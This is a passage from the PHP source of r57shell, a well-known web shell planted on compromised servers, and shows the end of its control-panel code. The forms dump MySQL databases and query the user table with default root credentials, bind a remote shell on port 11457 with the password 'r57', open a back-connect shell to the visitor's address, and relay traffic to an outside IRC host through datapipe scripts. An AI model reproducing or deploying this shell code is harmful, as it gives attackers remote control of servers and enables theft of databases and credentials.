2171echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2172echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
2173echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2174echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2175echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2176echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2177echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2178echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2179echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
2180echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
2181}
2182if(!$safe_mode&&$unix){
2183echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2184echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2185echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
2186echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
2187echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2188echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2189echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2190echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2191echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2192echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
2193echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2194echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2195echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2196echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2197echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
2198echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
2199echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
2200echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2201echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2202echo $te."</td>".$fe."</tr></div></table>";
2203}
2204echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>";
2205echo '</body></html>';
2206?>